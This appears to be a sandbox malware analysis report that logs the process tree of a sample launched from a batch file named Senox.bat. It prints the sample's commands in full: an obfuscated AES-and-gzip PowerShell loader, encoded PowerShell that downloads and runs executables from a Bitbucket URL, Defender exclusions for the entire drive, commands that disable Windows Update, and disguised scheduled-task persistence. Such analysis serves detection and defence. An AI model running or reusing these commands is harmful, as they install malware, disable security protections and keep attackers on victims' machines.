PID 2864 wrote to memory of 3852	2864	cmd.exe	containersavesdhcp.exe
PID 3556 wrote to memory of 1508	3556	AntiDebug.exe	cmd.exe
PID 3556 wrote to memory of 1508	3556	AntiDebug.exe	cmd.exe
PID 3556 wrote to memory of 2384	3556	AntiDebug.exe	cmd.exe
PID 3556 wrote to memory of 2384	3556	AntiDebug.exe	cmd.exe
PID 1508 wrote to memory of 476	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 476	1508	cmd.exe	sc.exe
PID 3556 wrote to memory of 1856	3556	AntiDebug.exe	powershell.exe
PID 3556 wrote to memory of 1856	3556	AntiDebug.exe	powershell.exe
PID 2384 wrote to memory of 4420	2384	cmd.exe	powercfg.exe
PID 2384 wrote to memory of 4420	2384	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 3772	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 3772	1508	cmd.exe	sc.exe
PID 2384 wrote to memory of 4412	2384	cmd.exe	powercfg.exe
PID 2384 wrote to memory of 4412	2384	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 3372	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 3372	1508	cmd.exe	sc.exe
PID 2384 wrote to memory of 3728	2384	cmd.exe	powercfg.exe
PID 2384 wrote to memory of 3728	2384	cmd.exe	powercfg.exe
PID 2384 wrote to memory of 4864	2384	cmd.exe	powercfg.exe
PID 2384 wrote to memory of 4864	2384	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 1904	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 1904	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 5004	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 5004	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 1684	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1684	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 3052	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 3052	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1420	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1420	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1964	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1964	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1008	1508	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2968 attrib.exe

pid	process
2968	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Senox.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\Senox.bat.exe
"Senox.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eaqcw = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Senox.bat').Split([Environment]::NewLine);foreach ($VtoBl in $eaqcw) { if ($VtoBl.StartsWith(':: ')) { $BMjJe = $VtoBl.Substring(3); break; }; };$VGGCQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($BMjJe);$hbvqO = New-Object System.Security.Cryptography.AesManaged;$hbvqO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$hbvqO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$hbvqO.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wYPqphQqHyVIeW2CaPqkTUCy/0ecJs6agKij7Q3HRY4=');$hbvqO.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E55hmIoW8UIQx1ajzTvfAA==');$CfOAS = $hbvqO.CreateDecryptor();$VGGCQ = $CfOAS.TransformFinalBlock($VGGCQ, 0, $VGGCQ.Length);$CfOAS.Dispose();$hbvqO.Dispose();$YVjlv = New-Object System.IO.MemoryStream(, $VGGCQ);$iJFSw = New-Object System.IO.MemoryStream;$uwkaq = New-Object System.IO.Compression.GZipStream($YVjlv, [IO.Compression.CompressionMode]::Decompress);$uwkaq.CopyTo($iJFSw);$uwkaq.Dispose();$YVjlv.Dispose();$iJFSw.Dispose();$VGGCQ = $iJFSw.ToArray();$WtHIs = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($VGGCQ);$iFZWS = $WtHIs.EntryPoint;$iFZWS.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAbgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAegBiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHoAcAB3ACMAPgA7ACIAOwA8ACMAbgBsAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB4AGUAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBlAG4AdgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AGYAYgAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANgAxAC8AbABhAHMAdAB0AGUAcwB0AC8AcgBhAHcALwBiADkAMgA5AGIANAAzADcAYgA3ADUAYwAwAGQAZQA0AGQANwBjADIAYQBiAGYAYwAzADYAMQA0ADAAMABjADUAZgBlADUAYwA4AGMAYQA1AC8ASwB5AHMALgBlAHgAZQAnACwAIAA8ACMAZgBxAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBnAGYAdAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAHAAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAHIAbwB0AGUAYwB0AG8AcgAuAGUAeABlACcAKQApADwAIwByAGQAcgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AbAB1AGMAaQBmAGUAcgA2ADEALwBsAGEAcwB0AHQAZQBzAHQALwByAGEAdwAvAGIAOQAyADkAYgA0ADMANwBiADcANQBjADAAZABlADQAZAA3AGMAMgBhAGIAZgBjADMANgAxADQAMAAwAGMANQBmAGUANQBjADgAYwBhADUALwBtAGkAbQBpAG0AaQAuAGUAeABlACcALAAgADwAIwBhAHQAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAbgBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAbgB0AGkARABlAGIAdQBnAC4AZQB4AGUAJwApACkAPAAjAHAAbQBkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAZwB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAHIAbwB0AGUAYwB0AG8AcgAuAGUAeABlACcAKQA8ACMAcABzAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbQBuAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAeQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAbgB0AGkARABlAGIAdQBnAC4AZQB4AGUAJwApADwAIwBrAHcAZwAjAD4A"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#dzb#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#zpw#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828

C:\Users\Admin\AppData\Local\Temp\Protector.exe
"C:\Users\Admin\AppData\Local\Temp\Protector.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comsavesbroker\9vifgPznNWM81sSYpbQjkuUh7.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:2864

C:\comsavesbroker\containersavesdhcp.exe
"C:\comsavesbroker\containersavesdhcp.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
8⤵
PID:4120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comsavesbroker/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lJwS3LgKwS.bat"
8⤵
PID:4660

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
9⤵
PID:1684

C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe
"C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe"
9⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2792

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5a27e89-2bdb-493f-903c-9534c678f33e.vbs"
10⤵
PID:5080

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\acaaba7e-50c8-4265-9e5b-227a89b37319.vbs"
10⤵
PID:1056

C:\Users\Admin\AppData\Local\Temp\AntiDebug.exe
"C:\Users\Admin\AppData\Local\Temp\AntiDebug.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBuAGgAcQBrACMAPgAgAEAAKAAgADwAIwBtAHcAdAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqAGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAbABkAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBlAGcAIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:476

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:3772

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:3372

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:1904

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:5004

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:1684

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:3052

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:1420

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1964

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:1008

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4664

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1012

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:4764

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2348

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:508

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:5028

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:3268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:3460

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:4356

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:1260

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:2732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:2384

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4420

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4412

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3728

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZQBrACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAGMAaAByAC4AZQB4AGUAIgAnACkAIAA8ACMAawBmAHEAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBpAGYAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBiAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBHAE4AQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBrAHUAIwA+ADsA"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
5⤵
PID:4672

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineGNC"
6⤵
PID:3844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\Senox.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\Senox.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3956

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:4552

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\Senox.bat.exe"
4⤵
- Views/modifies file attributes
PID:2968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Reference Assemblies\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Reference Assemblies\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\SysWOW64\fr\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\SysWOW64\fr\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\SysWOW64\fr\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\odt\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4960

